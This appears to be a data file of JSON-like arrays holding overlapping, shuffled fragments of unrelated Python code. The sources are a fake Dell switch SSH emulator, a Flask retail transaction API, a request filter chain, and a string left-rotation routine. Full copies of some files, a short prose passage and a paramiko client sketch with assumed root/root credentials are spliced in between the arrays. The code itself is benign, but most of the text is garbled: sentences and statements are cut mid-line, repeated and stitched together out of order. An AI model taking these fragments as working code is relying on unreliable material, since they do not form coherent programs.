"CustomPort(\"Eth1/9\"), CustomPort(\"Eth1/10\"), CustomPort(\"Eth1/11\"), CustomPort(\"Eth1/12\"), CustomPort(\"Eth1/13\"), CustomPort(\"Eth1/14\"), CustomPort(\"Eth1/15\"), CustomPort(\"Eth1/16\"), CustomPort(\"Eth1/17\"), CustomPort(\"Eth1/18\"), CustomPort(\"Eth1/19\"), CustomPort(\"Eth1/20\"), CustomPort(\"Eth1/21\"),",
"import reactor from fake_switches.switch_configuration import SwitchConfiguration, Port from fake_switches.transports.ssh_service import SwitchSshService from fake_switches.dell.dell_core",
"CustomPort(\"Eth1/7\"), CustomPort(\"Eth1/8\"), CustomPort(\"Eth1/9\"), CustomPort(\"Eth1/10\"), CustomPort(\"Eth1/11\"), CustomPort(\"Eth1/12\"), CustomPort(\"Eth1/13\"), CustomPort(\"Eth1/14\"), CustomPort(\"Eth1/15\"), CustomPort(\"Eth1/16\"), CustomPort(\"Eth1/17\"), CustomPort(\"Eth1/18\"), CustomPort(\"Eth1/19\"),",
"CustomPort(\"Eth1/13\"), CustomPort(\"Eth1/14\"), CustomPort(\"Eth1/15\"), CustomPort(\"Eth1/16\"), CustomPort(\"Eth1/17\"), CustomPort(\"Eth1/18\"), CustomPort(\"Eth1/19\"), CustomPort(\"Eth1/20\"), CustomPort(\"Eth1/21\"), CustomPort(\"Eth1/22\"), CustomPort(\"Eth1/23\"), CustomPort(\"Eth1/24\"), CustomPort(\"Eth1/25\"),",
"CustomPort(\"Eth1/20\"), CustomPort(\"Eth1/21\"), CustomPort(\"Eth1/22\"), CustomPort(\"Eth1/23\"), CustomPort(\"Eth1/24\"), CustomPort(\"Eth1/25\"), CustomPort(\"Eth1/26\"), CustomPort(\"Eth1/27\"), CustomPort(\"Eth1/28\"), CustomPort(\"Eth1/29\"), CustomPort(\"Eth1/30\"), CustomPort(\"Eth1/31\"), CustomPort(\"Eth1/32\"),",
"self._access_vlan @access_vlan.setter def access_vlan(self, value): if self._access_vlan != value: self._access_vlan = value print(\"This",
"from fake_switches.switch_configuration import SwitchConfiguration, Port from fake_switches.transports.ssh_service import SwitchSshService from fake_switches.dell.dell_core import DellSwitchCore",
"= None super(CustomPort, self).__init__(name) @property def access_vlan(self): return self._access_vlan @access_vlan.setter def access_vlan(self, value):",
"CustomPort(\"Eth1/22\"), CustomPort(\"Eth1/23\"), CustomPort(\"Eth1/24\"), CustomPort(\"Eth1/25\"), CustomPort(\"Eth1/26\"), CustomPort(\"Eth1/27\"), CustomPort(\"Eth1/28\"), CustomPort(\"Eth1/29\"), CustomPort(\"Eth1/30\"), CustomPort(\"Eth1/31\"), CustomPort(\"Eth1/32\"), CustomPort(\"mgmt0\"), CustomPort(\"Lo0\"),",
"self).__init__(objects_overrides={\"Port\": CustomPort}, *args, **kwargs) class CustomPort(Port): def __init__(self, name): self._access_vlan = None super(CustomPort,",
"Port from fake_switches.transports.ssh_service import SwitchSshService from fake_switches.dell.dell_core import DellSwitchCore class CustomSwitchConfiguration(SwitchConfiguration): def __init__(self,"
] |
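The script above listens on 127.0.0.1:11001 and emulates a Dell-style CLI over SSH, so any ordinary SSH client can drive it. Below is a minimal client sketch using paramiko; the root/root credentials are an assumption based on fake_switches' usual defaults, so adjust them to your deployment.

# Minimal client sketch for the fake switch above (assumed credentials).
import time

import paramiko

client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# root/root is assumed here; your fake_switches setup may differ.
client.connect("127.0.0.1", port=11001, username="root", password="root",
               look_for_keys=False, allow_agent=False)

shell = client.invoke_shell()          # interactive channel, like a real switch CLI
shell.send("show running-config\n")    # any command the Dell core understands
time.sleep(1)                          # crude wait for the emulated CLI to answer
print(shell.recv(65535).decode())
client.close()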
# -*- coding: utf-8 -*-
from flask import request
from flask_restful import Resource
from flask_restful import abort
import decimal as D

from db import MerchandiseDao, TransactionDao, TransDetailDao, EmployeeDao
from db import ShiftsDao, VIPTransRecordDao
from .Auth import auth

merch_dao = MerchandiseDao()
trans_dao = TransactionDao()
detail_dao = TransDetailDao()
employ_dao = EmployeeDao()
shift_dao = ShiftsDao()
viprec_dao = VIPTransRecordDao()


class TransactionApi(Resource):
    @auth.login_required
    def get(self, start: int, count: int):
        '''
        Arguments
        ---------
        start: int
        count: int
            Maximum rows to return. If <= 0, return all rows.
        '''
        sql = f'''
            select T.`id`, T.`time`, T.`cashier`, E.`login`, sum(D.`price` * D.`count`)
            from `{trans_dao._table}` as T, `{employ_dao._table}` as E, `{detail_dao._table}` as D
            where T.`id` >= %s and T.`cashier` = E.`id` and T.`id` = D.`trans_id`
            group by T.`id`
            order by T.`time` desc
        '''
        if count > 0:
            sql += ' limit %s'
            value = (start, count)
        else:
            value = (start,)
        with trans_dao._conn.cursor() as cur:
            try:
                cur.execute(sql, value)
                result = [row for row in cur]
                trans_dao._conn.commit()
            except Exception as e:
                trans_dao._conn.rollback()
                abort(500, str(e))
        return [
            {
                'trans_id': row[0],
                'time': row[1].strftime('%Y-%m-%d %H:%M:%S'),
                'cashier_id': row[2],
                'cashier_login': row[3],
                'sum': float(row[4])
            } for row in result
        ], 200

    @auth.login_required
    def post(self):
        '''
        JSON data format:
        {
            'vip_id': vip_id or None,
            'cashier': cashier_id: int,
            'trans': [
                [merch_id: int, actual_price: float, count: int],
                ...
            ]
        }
        '''
        data = request.get_json()
        if 'cashier' not in data or 'trans' not in data:
            return {
                'reason': 'cashier, trans data must be given!'
            }, 406
        cashier, trans_items = data['cashier'], data['trans']
        vip_id = data['vip_id'] if 'vip_id' in data else None
        if not employ_dao.has_id(cashier):
            return {
                'reason': f'Cashier ID {cashier} is illegal!'
            }, 406
        conn = trans_dao._conn
        with conn.cursor() as cur:
            try:
                # create transaction master record
                trans_id = trans_dao.start(cashier, cur)
                if trans_id < 0:
                    conn.rollback()
                    abort(500, message='Failed to start transaction!')
                # consume stored merchandise
                for merch_id, _, count in trans_items:
                    ret = merch_dao.consume(merch_id, count, cur)
                    if ret:
                        conn.rollback()
                        if ret == -1 or ret == 3:
                            return {
                                'merch_id': merch_id,
                                'reason': 'Illegal ID'
                            }, 406
                        if ret == 1:
                            return {
                                'merch_id': merch_id,
                                'reason': 'Not enough in storage'
                            }, 406
                        if ret == 2:
                            return {
                                'merch_id': merch_id,
                                'reason': 'UPDATE finished with error'
                            }, 406
                        abort(500, message=f'Unknown error at consume(): {ret}.')
                # fill transaction details
                if detail_dao.fill(trans_id, trans_items, cur):
                    conn.rollback()
                    abort(500, message='Error occurred while filling '
                                       'transaction details!')
                # get sum of current transaction
                trans_sum = detail_dao.get_sum(trans_id, cur)
                if trans_sum is None:
                    conn.rollback()
                    abort(500)
                # update VIP card info
                if vip_id is not None:
                    ret = viprec_dao.transact_cb(vip_id, trans_sum, cur)
                    if ret != 0 and ret != 1:
                        conn.rollback()
                        if ret == -1:
                            return {
                                'vip_id': vip_id,
                                'reason': 'Invalid VIP ID'
                            }, 406
                        if ret == 2:
                            return {
                                'vip_id': vip_id,
                                'reason': 'VIP card timeout'
                            }, 406
                        abort(500, message='Unknown error at VIPTransRecordDao'
                                           f'.transact_cb(): {ret}.')
                # update shifts info
                if shift_dao.transact_cb(cashier, trans_sum, cur):
                    conn.rollback()
                    return {
                        'reason': f'Employee {cashier} not logged in!'
                    }, 406
                conn.commit()
            except Exception as e:
                conn.rollback()
                abort(500, message=str(e))
        return '', 200


class TransDetailApi(Resource):
    @auth.login_required
    def get(self, trans_id: int):
        sql = f'''
            select D.`merch_id`, M.`name`, D.`price`, M.`price` as orig_price, D.`count`
            from `{merch_dao._table}` as M, `{detail_dao._table}` as D
            where D.`trans_id` = %s and M.`id` = D.`merch_id`
        '''
        value = (trans_id,)
        with detail_dao._conn.cursor() as cur:
            try:
                cur.execute(sql, value)
                ret = [row for row in cur]
                detail_dao._conn.commit()
            except Exception as e:
                detail_dao._conn.rollback()
                abort(500, message=str(e))
        return [
            {
                'merch_id': row[0],
                'name': row[1],
                'actual_price': float(row[2]),
                'orig_price': float(row[3]),
                'count': row[4]
            } for row in ret
        ], 200
"D from db import MerchandiseDao, TransactionDao, TransDetailDao, EmployeeDao from db import ShiftsDao, VIPTransRecordDao",
"detail_dao.get_sum(trans_id, cur) if trans_sum is None: conn.rollback() abort(500) # update VIP card info",
"[ { 'trans_id': row[0], 'time': row[1].strftime('%Y-%m-%d %H:%M:%S'), 'cashier_id': row[2], 'cashier_login': row[3], 'sum': float(row[4])",
"transaction details if detail_dao.fill(trans_id, trans_items, cur): conn.rollback() abort(500, message='Error occured while filling '",
"of current transaction trans_sum = detail_dao.get_sum(trans_id, cur) if trans_sum is None: conn.rollback() abort(500)",
"-*- coding: utf-8 -*- from flask import request from flask_restful import Resource from",
"abort(500, message=f'Unknown error at consume(): {ret}.') # fill transaction details if detail_dao.fill(trans_id, trans_items,",
"as orig_price, D.`count` from `{merch_dao._table}` as M, `{detail_dao._table}` as D where D.`trans_id` =",
"ret == 2: return { 'merch_id': merch_id, 'reason': 'UPDATE finished with error' },",
"* D.`count`) from `{trans_dao._table}` as T, `{employ_dao._table}` as E, `{detail_dao._table}` as D where",
"# -*- coding: utf-8 -*- from flask import request from flask_restful import Resource",
"details!') # get sum of current transaction trans_sum = detail_dao.get_sum(trans_id, cur) if trans_sum",
"`{employ_dao._table}` as E, `{detail_dao._table}` as D where T.`id` >= %s and T.`cashier` =",
"Resource from flask_restful import abort import decimal as D from db import MerchandiseDao,",
"not in data or 'trans' not in data: return { 'reason': 'cashier, trans",
"timeout' }, 406 abort(500, message='Unknown error at VIPTransRecordDao' f'.transact_db(): {ret}.') # update shifts",
"conn.commit() except Exception as e: conn.rollback() abort(500, message=str(e)) return '', 200 class TransDetailApi(Resource):",
"T, `{employ_dao._table}` as E, `{detail_dao._table}` as D where T.`id` >= %s and T.`cashier`",
"'reason': 'Not enough in storage' }, 406 if ret == 2: return {",
"= trans_dao.start(cashier, cur) # create transaction master record if trans_id < 0: conn.rollback()",
"'vip_id': vip_id, 'reason': 'Invalid VIP ID' }, 406 if ret == 2: return",
"== 2: return { 'vip_id': vip_id, 'reason': 'VIP card timeout' }, 406 abort(500,",
"float, count: int], ... ] } ''' data = request.get_json() if 'cashier' not",
"as cur: try: cur.execute(sql, value) result = [row for row in cur] trans_dao._conn.commit()",
"= D.`merch_id` ''' value = (trans_id,) with detail_dao._conn.cursor() as cur: try: cur.execute(sql, value)",
"trans_dao = TransactionDao() detail_dao = TransDetailDao() employ_dao = EmployeeDao() shift_dao = ShiftsDao() viprec_dao",
"D.`count` from `{merch_dao._table}` as M, `{detail_dao._table}` as D where D.`trans_id` = %s and",
"VIPTransRecordDao() class TransactionApi(Resource): @auth.login_required def get(self, start: int, count: int): ''' Arguments ---------",
"conn = trans_dao._conn with conn.cursor() as cur: try: trans_id = trans_dao.start(cashier, cur) #",
"= [row for row in cur] trans_dao._conn.commit() except Exception as e: trans_dao._conn.rollback() abort(500,",
"ret == 1: return { 'merch_id': merch_id, 'reason': 'Not enough in storage' },",
"conn.rollback() abort(500, message='Failed to start transaction!') # consume stored merchandise for merch_id, _,",
"'merch_id': merch_id, 'reason': 'UPDATE finished with error' }, 406 abort(500, message=f'Unknown error at",
"'cashier_id': row[2], 'cashier_login': row[3], 'sum': float(row[4]) } for row in result ], 200",
"if 'cashier' not in data or 'trans' not in data: return { 'reason':",
"in result ], 200 @auth.login_required def post(self): ''' JSON data format: { 'vip_id':",
"as D where D.`trans_id` = %s and M.`id` = D.`merch_id` ''' value =",
"] } ''' data = request.get_json() if 'cashier' not in data or 'trans'",
"in cur] trans_dao._conn.commit() except Exception as e: trans_dao._conn.rollback() abort(500, str(e)) return [ {",
"for merch_id, _, count in trans_items: ret = merch_dao.consume(merch_id, count, cur) if ret:",
"import ShiftsDao, VIPTransRecordDao from .Auth import auth merch_dao = MerchandiseDao() trans_dao = TransactionDao()",
"'Illegal ID' }, 406 if ret == 1: return { 'merch_id': merch_id, 'reason':",
"M.`price` as orig_price, D.`count` from `{merch_dao._table}` as M, `{detail_dao._table}` as D where D.`trans_id`",
"coding: utf-8 -*- from flask import request from flask_restful import Resource from flask_restful",
"try: trans_id = trans_dao.start(cashier, cur) # create transaction master record if trans_id <",
"sql = f''' select T.`id`, T.`time`, T.`cashier`, E.`login`, sum(D.`price` * D.`count`) from `{trans_dao._table}`",
"storage' }, 406 if ret == 2: return { 'merch_id': merch_id, 'reason': 'UPDATE",
"if shift_dao.transact_cb(cashier, trans_sum, cur): conn.rollback() return { 'reason': f'Employee {cashier} not logged in!'",
"occured while filling ' 'transaction details!') # get sum of current transaction trans_sum",
"ID {cashier} is illegal!' }, 406 conn = trans_dao._conn with conn.cursor() as cur:",
"if 'vip_id' in data else None if not employ_dao.has_id(cashier): return { 'reason': f'Cashier",
"get sum of current transaction trans_sum = detail_dao.get_sum(trans_id, cur) if trans_sum is None:",
"as D from db import MerchandiseDao, TransactionDao, TransDetailDao, EmployeeDao from db import ShiftsDao,",
"T.`time`, T.`cashier`, E.`login`, sum(D.`price` * D.`count`) from `{trans_dao._table}` as T, `{employ_dao._table}` as E,",
"cur) if ret != 0 and ret != 1: conn.rollback() if ret ==",
"If <= 0, return all rows. ''' sql = f''' select T.`id`, T.`time`,",
"merch_dao = MerchandiseDao() trans_dao = TransactionDao() detail_dao = TransDetailDao() employ_dao = EmployeeDao() shift_dao",
"in!' }, 406 conn.commit() except Exception as e: conn.rollback() abort(500, message=str(e)) return '',",
"ret != 0 and ret != 1: conn.rollback() if ret == -1: return",
"T.`cashier` = E.`id` and T.`id` = D.`trans_id` group by T.`id` order by T.`time`",
"' 'transaction details!') # get sum of current transaction trans_sum = detail_dao.get_sum(trans_id, cur)",
"cur) if trans_sum is None: conn.rollback() abort(500) # update VIP card info if",
"conn.rollback() abort(500, message=str(e)) return '', 200 class TransDetailApi(Resource): @auth.login_required def get(self, trans_id: int):",
"ShiftsDao, VIPTransRecordDao from .Auth import auth merch_dao = MerchandiseDao() trans_dao = TransactionDao() detail_dao",
"row in cur] trans_dao._conn.commit() except Exception as e: trans_dao._conn.rollback() abort(500, str(e)) return [",
"'cashier' not in data or 'trans' not in data: return { 'reason': 'cashier,",
"}, 406 abort(500, message='Unknown error at VIPTransRecordDao' f'.transact_db(): {ret}.') # update shifts info",
"not employ_dao.has_id(cashier): return { 'reason': f'Cashier ID {cashier} is illegal!' }, 406 conn",
"conn.rollback() return { 'reason': f'Employee {cashier} not logged in!' }, 406 conn.commit() except",
"ret == 2: return { 'vip_id': vip_id, 'reason': 'VIP card timeout' }, 406",
"create transaction master record if trans_id < 0: conn.rollback() abort(500, message='Failed to start",
"sum(D.`price` * D.`count`) from `{trans_dao._table}` as T, `{employ_dao._table}` as E, `{detail_dao._table}` as D",
"merch_id, 'reason': 'Illegal ID' }, 406 if ret == 1: return { 'merch_id':",
"conn.rollback() abort(500) # update VIP card info if vip_id is not None: ret",
"detail_dao = TransDetailDao() employ_dao = EmployeeDao() shift_dao = ShiftsDao() viprec_dao = VIPTransRecordDao() class",
"# fill transaction details if detail_dao.fill(trans_id, trans_items, cur): conn.rollback() abort(500, message='Error occured while",
"stored merchandise for merch_id, _, count in trans_items: ret = merch_dao.consume(merch_id, count, cur)",
"to start transaction!') # consume stored merchandise for merch_id, _, count in trans_items:",
"= E.`id` and T.`id` = D.`trans_id` group by T.`id` order by T.`time` desc",
"start transaction!') # consume stored merchandise for merch_id, _, count in trans_items: ret",
"= viprec_dao.transact_cb(vip_id, trans_sum, cur) if ret != 0 and ret != 1: conn.rollback()",
"def get(self, trans_id: int): sql = f''' select D.`merch_id`, M.`name`, D.`price`, M.`price` as",
"import request from flask_restful import Resource from flask_restful import abort import decimal as",
"count) else: value = (start,) with trans_dao._conn.cursor() as cur: try: cur.execute(sql, value) result",
"abort(500, message=str(e)) return '', 200 class TransDetailApi(Resource): @auth.login_required def get(self, trans_id: int): sql",
"T.`time` desc ''' if count > 0: sql += ' limit %s' value",
"order by T.`time` desc ''' if count > 0: sql += ' limit",
"cur.execute(sql, value) result = [row for row in cur] trans_dao._conn.commit() except Exception as",
"E.`login`, sum(D.`price` * D.`count`) from `{trans_dao._table}` as T, `{employ_dao._table}` as E, `{detail_dao._table}` as",
"== -1: return { 'vip_id': vip_id, 'reason': 'Invalid VIP ID' }, 406 if"
] |
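A client-side sketch of the POST contract above; the host, route, and credentials are assumptions (only the server side is recoverable from this row), and requests is not part of the API module itself.

import requests  # assumed HTTP client, not part of the API module

# Hypothetical deployment details: host and route are illustrative only.
URL = 'http://localhost:5000/api/transaction'
payload = {
    'vip_id': None,                           # optional VIP card
    'cashier': 3,                             # must satisfy employ_dao.has_id()
    'trans': [[101, 9.5, 2], [205, 1.2, 1]],  # [merch_id, actual_price, count]
}
resp = requests.post(URL, json=payload, auth=('cashier_login', 'password'))
print(resp.status_code, resp.text)            # 200 on success, 406 with a 'reason' otherwise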
[
"executer: Executer) -> Executer: filters = self.context.url.get_param(\"filters\", []) for cls in reversed([import_string(f) for",
"context: Any): self.context = context def then(self, executer: Executer) -> Executer: filters =",
"gevent.monkey import patch_thread # type: ignore from doge.common.doge import Executer, Request, Response from",
"Any, _next: Executer): self.next = _next def execute(self, req: Request) -> Response: return",
"Any from gevent.monkey import patch_thread # type: ignore from doge.common.doge import Executer, Request,",
"execute(self, req: Request) -> Response: return self.next.execute(req) class FilterChain: def __init__(self, context: Any):",
"Executer, Request, Response from doge.common.utils import import_string patch_thread() class BaseFilter(Executer): def __init__(self, context:",
"import patch_thread # type: ignore from doge.common.doge import Executer, Request, Response from doge.common.utils",
"= _next def execute(self, req: Request) -> Response: return self.next.execute(req) class FilterChain: def",
"-> Response: return self.next.execute(req) class FilterChain: def __init__(self, context: Any): self.context = context",
"type: ignore from doge.common.doge import Executer, Request, Response from doge.common.utils import import_string patch_thread()",
"context: Any, _next: Executer): self.next = _next def execute(self, req: Request) -> Response:",
"import import_string patch_thread() class BaseFilter(Executer): def __init__(self, context: Any, _next: Executer): self.next =",
"= context def then(self, executer: Executer) -> Executer: filters = self.context.url.get_param(\"filters\", []) for",
"context def then(self, executer: Executer) -> Executer: filters = self.context.url.get_param(\"filters\", []) for cls",
"doge.common.doge import Executer, Request, Response from doge.common.utils import import_string patch_thread() class BaseFilter(Executer): def",
"def __init__(self, context: Any): self.context = context def then(self, executer: Executer) -> Executer:",
"import Any from gevent.monkey import patch_thread # type: ignore from doge.common.doge import Executer,",
"class FilterChain: def __init__(self, context: Any): self.context = context def then(self, executer: Executer)",
"def __init__(self, context: Any, _next: Executer): self.next = _next def execute(self, req: Request)",
"Request) -> Response: return self.next.execute(req) class FilterChain: def __init__(self, context: Any): self.context =",
"req: Request) -> Response: return self.next.execute(req) class FilterChain: def __init__(self, context: Any): self.context",
"Any): self.context = context def then(self, executer: Executer) -> Executer: filters = self.context.url.get_param(\"filters\",",
"def then(self, executer: Executer) -> Executer: filters = self.context.url.get_param(\"filters\", []) for cls in",
"_next: Executer): self.next = _next def execute(self, req: Request) -> Response: return self.next.execute(req)",
"__init__(self, context: Any): self.context = context def then(self, executer: Executer) -> Executer: filters",
"self.next.execute(req) class FilterChain: def __init__(self, context: Any): self.context = context def then(self, executer:",
"self.context = context def then(self, executer: Executer) -> Executer: filters = self.context.url.get_param(\"filters\", [])",
"from typing import Any from gevent.monkey import patch_thread # type: ignore from doge.common.doge",
"Executer: filters = self.context.url.get_param(\"filters\", []) for cls in reversed([import_string(f) for f in filters]):",
"= self.context.url.get_param(\"filters\", []) for cls in reversed([import_string(f) for f in filters]): executer =",
"import_string patch_thread() class BaseFilter(Executer): def __init__(self, context: Any, _next: Executer): self.next = _next",
"self.context.url.get_param(\"filters\", []) for cls in reversed([import_string(f) for f in filters]): executer = cls(self.context,",
"cls in reversed([import_string(f) for f in filters]): executer = cls(self.context, executer) return executer",
"patch_thread # type: ignore from doge.common.doge import Executer, Request, Response from doge.common.utils import",
"FilterChain: def __init__(self, context: Any): self.context = context def then(self, executer: Executer) ->",
"ignore from doge.common.doge import Executer, Request, Response from doge.common.utils import import_string patch_thread() class",
"patch_thread() class BaseFilter(Executer): def __init__(self, context: Any, _next: Executer): self.next = _next def",
"Response: return self.next.execute(req) class FilterChain: def __init__(self, context: Any): self.context = context def",
"-> Executer: filters = self.context.url.get_param(\"filters\", []) for cls in reversed([import_string(f) for f in",
"for cls in reversed([import_string(f) for f in filters]): executer = cls(self.context, executer) return",
"[]) for cls in reversed([import_string(f) for f in filters]): executer = cls(self.context, executer)",
"self.next = _next def execute(self, req: Request) -> Response: return self.next.execute(req) class FilterChain:",
"Request, Response from doge.common.utils import import_string patch_thread() class BaseFilter(Executer): def __init__(self, context: Any,",
"Response from doge.common.utils import import_string patch_thread() class BaseFilter(Executer): def __init__(self, context: Any, _next:",
"def execute(self, req: Request) -> Response: return self.next.execute(req) class FilterChain: def __init__(self, context:",
"return self.next.execute(req) class FilterChain: def __init__(self, context: Any): self.context = context def then(self,",
"import Executer, Request, Response from doge.common.utils import import_string patch_thread() class BaseFilter(Executer): def __init__(self,",
"_next def execute(self, req: Request) -> Response: return self.next.execute(req) class FilterChain: def __init__(self,",
"# type: ignore from doge.common.doge import Executer, Request, Response from doge.common.utils import import_string",
"from doge.common.utils import import_string patch_thread() class BaseFilter(Executer): def __init__(self, context: Any, _next: Executer):",
"from gevent.monkey import patch_thread # type: ignore from doge.common.doge import Executer, Request, Response",
"__init__(self, context: Any, _next: Executer): self.next = _next def execute(self, req: Request) ->",
"from doge.common.doge import Executer, Request, Response from doge.common.utils import import_string patch_thread() class BaseFilter(Executer):",
"Executer): self.next = _next def execute(self, req: Request) -> Response: return self.next.execute(req) class",
"doge.common.utils import import_string patch_thread() class BaseFilter(Executer): def __init__(self, context: Any, _next: Executer): self.next",
"BaseFilter(Executer): def __init__(self, context: Any, _next: Executer): self.next = _next def execute(self, req:",
"class BaseFilter(Executer): def __init__(self, context: Any, _next: Executer): self.next = _next def execute(self,",
"then(self, executer: Executer) -> Executer: filters = self.context.url.get_param(\"filters\", []) for cls in reversed([import_string(f)",
"typing import Any from gevent.monkey import patch_thread # type: ignore from doge.common.doge import",
"filters = self.context.url.get_param(\"filters\", []) for cls in reversed([import_string(f) for f in filters]): executer",
"Executer) -> Executer: filters = self.context.url.get_param(\"filters\", []) for cls in reversed([import_string(f) for f"
] |
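A standalone sketch of the chaining order implemented by FilterChain.then(); class and tag names here are illustrative, not from the doge package. It shows why the list is wrapped in reversed(): the first configured filter ends up outermost.

class EchoExecuter:
    # Stands in for the terminal executer at the end of the chain.
    def execute(self, req):
        return f'handled({req})'


def make_filter(tag):
    # Builds a minimal filter class in the shape of BaseFilter.
    class Filter:
        def __init__(self, _next):
            self.next = _next

        def execute(self, req):
            return f'{tag}<{self.next.execute(req)}>'
    return Filter


filters = [make_filter('logging'), make_filter('timing')]  # configured order
executer = EchoExecuter()
for cls in reversed(filters):
    executer = cls(executer)

print(executer.execute('req'))  # logging<timing<handled(req)>>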
[
"== 0: return None if n < 0 or n >len(string): return None",
"= n - 1 end = len(string) - 1 __reverse(str_arr, begin, div) __reverse(str_arr,",
"1 end = len(string) - 1 __reverse(str_arr, begin, div) __reverse(str_arr, div+1, end) __reverse(str_arr,",
"str_arr[begin] begin += 1 end -= 1 if __name__ == \"__main__\": string =",
"__name__ == \"__main__\": string = 'abcdefg' rotate = 2 print('\"%s\" left rotate %d:",
"def __reverse(str_arr, begin, end): while begin < end: str_arr[begin], str_arr[end] = str_arr[end], str_arr[begin]",
"string is None or len(string) == 0: return None if n < 0",
"1 end -= 1 if __name__ == \"__main__\": string = 'abcdefg' rotate =",
"n >len(string): return None str_arr = [x for x in string] begin =",
"left_rotate(string, n): if string is None or len(string) == 0: return None if",
"1 __reverse(str_arr, begin, div) __reverse(str_arr, div+1, end) __reverse(str_arr, begin, end) return ''.join(str_arr) def",
"__reverse(str_arr, div+1, end) __reverse(str_arr, begin, end) return ''.join(str_arr) def __reverse(str_arr, begin, end): while",
"请定义一个函数实现字符串左旋转操作的功能。 --------------- input: abcdefg 2 output: cdefgab ''' def left_rotate(string, n): if string",
"end) __reverse(str_arr, begin, end) return ''.join(str_arr) def __reverse(str_arr, begin, end): while begin <",
"begin += 1 end -= 1 if __name__ == \"__main__\": string = 'abcdefg'",
"< end: str_arr[begin], str_arr[end] = str_arr[end], str_arr[begin] begin += 1 end -= 1",
"< 0 or n >len(string): return None str_arr = [x for x in",
"= str_arr[end], str_arr[begin] begin += 1 end -= 1 if __name__ == \"__main__\":",
"output: cdefgab ''' def left_rotate(string, n): if string is None or len(string) ==",
"def left_rotate(string, n): if string is None or len(string) == 0: return None",
"if n < 0 or n >len(string): return None str_arr = [x for",
"0 or n >len(string): return None str_arr = [x for x in string]",
"end = len(string) - 1 __reverse(str_arr, begin, div) __reverse(str_arr, div+1, end) __reverse(str_arr, begin,",
"__reverse(str_arr, begin, end) return ''.join(str_arr) def __reverse(str_arr, begin, end): while begin < end:",
"or n >len(string): return None str_arr = [x for x in string] begin",
"if __name__ == \"__main__\": string = 'abcdefg' rotate = 2 print('\"%s\" left rotate",
"= [x for x in string] begin = 0 div = n -",
"0 div = n - 1 end = len(string) - 1 __reverse(str_arr, begin,",
"end): while begin < end: str_arr[begin], str_arr[end] = str_arr[end], str_arr[begin] begin += 1",
"end) return ''.join(str_arr) def __reverse(str_arr, begin, end): while begin < end: str_arr[begin], str_arr[end]",
"0: return None if n < 0 or n >len(string): return None str_arr",
"= 'abcdefg' rotate = 2 print('\"%s\" left rotate %d: %s' % (string, rotate,",
"字符串的左旋转操作是把字符串前面的若干个字符转移到字符串的尾部。 请定义一个函数实现字符串左旋转操作的功能。 --------------- input: abcdefg 2 output: cdefgab ''' def left_rotate(string, n): if",
"for x in string] begin = 0 div = n - 1 end",
"len(string) - 1 __reverse(str_arr, begin, div) __reverse(str_arr, div+1, end) __reverse(str_arr, begin, end) return",
"in string] begin = 0 div = n - 1 end = len(string)",
"== \"__main__\": string = 'abcdefg' rotate = 2 print('\"%s\" left rotate %d: %s'",
"is None or len(string) == 0: return None if n < 0 or",
"-= 1 if __name__ == \"__main__\": string = 'abcdefg' rotate = 2 print('\"%s\"",
"while begin < end: str_arr[begin], str_arr[end] = str_arr[end], str_arr[begin] begin += 1 end",
"None str_arr = [x for x in string] begin = 0 div =",
"begin = 0 div = n - 1 end = len(string) - 1",
"abcdefg 2 output: cdefgab ''' def left_rotate(string, n): if string is None or",
"end: str_arr[begin], str_arr[end] = str_arr[end], str_arr[begin] begin += 1 end -= 1 if",
"None or len(string) == 0: return None if n < 0 or n",
"str_arr[begin], str_arr[end] = str_arr[end], str_arr[begin] begin += 1 end -= 1 if __name__",
"div+1, end) __reverse(str_arr, begin, end) return ''.join(str_arr) def __reverse(str_arr, begin, end): while begin",
"begin < end: str_arr[begin], str_arr[end] = str_arr[end], str_arr[begin] begin += 1 end -=",
"n < 0 or n >len(string): return None str_arr = [x for x",
"= len(string) - 1 __reverse(str_arr, begin, div) __reverse(str_arr, div+1, end) __reverse(str_arr, begin, end)",
"if string is None or len(string) == 0: return None if n <",
"return ''.join(str_arr) def __reverse(str_arr, begin, end): while begin < end: str_arr[begin], str_arr[end] =",
"div) __reverse(str_arr, div+1, end) __reverse(str_arr, begin, end) return ''.join(str_arr) def __reverse(str_arr, begin, end):",
"x in string] begin = 0 div = n - 1 end =",
"str_arr = [x for x in string] begin = 0 div = n",
"rotate = 2 print('\"%s\" left rotate %d: %s' % (string, rotate, left_rotate(string, rotate)))",
"return None str_arr = [x for x in string] begin = 0 div",
"begin, end) return ''.join(str_arr) def __reverse(str_arr, begin, end): while begin < end: str_arr[begin],",
"__reverse(str_arr, begin, div) __reverse(str_arr, div+1, end) __reverse(str_arr, begin, end) return ''.join(str_arr) def __reverse(str_arr,",
"div = n - 1 end = len(string) - 1 __reverse(str_arr, begin, div)",
"'abcdefg' rotate = 2 print('\"%s\" left rotate %d: %s' % (string, rotate, left_rotate(string,",
"\"__main__\": string = 'abcdefg' rotate = 2 print('\"%s\" left rotate %d: %s' %",
"= 0 div = n - 1 end = len(string) - 1 __reverse(str_arr,",
"- 1 __reverse(str_arr, begin, div) __reverse(str_arr, div+1, end) __reverse(str_arr, begin, end) return ''.join(str_arr)",
"begin, div) __reverse(str_arr, div+1, end) __reverse(str_arr, begin, end) return ''.join(str_arr) def __reverse(str_arr, begin,",
"string] begin = 0 div = n - 1 end = len(string) -",
"--------------- input: abcdefg 2 output: cdefgab ''' def left_rotate(string, n): if string is",
"begin, end): while begin < end: str_arr[begin], str_arr[end] = str_arr[end], str_arr[begin] begin +=",
"or len(string) == 0: return None if n < 0 or n >len(string):",
"string = 'abcdefg' rotate = 2 print('\"%s\" left rotate %d: %s' % (string,",
"str_arr[end] = str_arr[end], str_arr[begin] begin += 1 end -= 1 if __name__ ==",
"2 output: cdefgab ''' def left_rotate(string, n): if string is None or len(string)",
"return None if n < 0 or n >len(string): return None str_arr =",
"n): if string is None or len(string) == 0: return None if n",
"str_arr[end], str_arr[begin] begin += 1 end -= 1 if __name__ == \"__main__\": string",
"n - 1 end = len(string) - 1 __reverse(str_arr, begin, div) __reverse(str_arr, div+1,",
"len(string) == 0: return None if n < 0 or n >len(string): return",
"1 if __name__ == \"__main__\": string = 'abcdefg' rotate = 2 print('\"%s\" left",
"None if n < 0 or n >len(string): return None str_arr = [x",
"''' def left_rotate(string, n): if string is None or len(string) == 0: return",
"end -= 1 if __name__ == \"__main__\": string = 'abcdefg' rotate = 2",
"__reverse(str_arr, begin, end): while begin < end: str_arr[begin], str_arr[end] = str_arr[end], str_arr[begin] begin",
"cdefgab ''' def left_rotate(string, n): if string is None or len(string) == 0:",
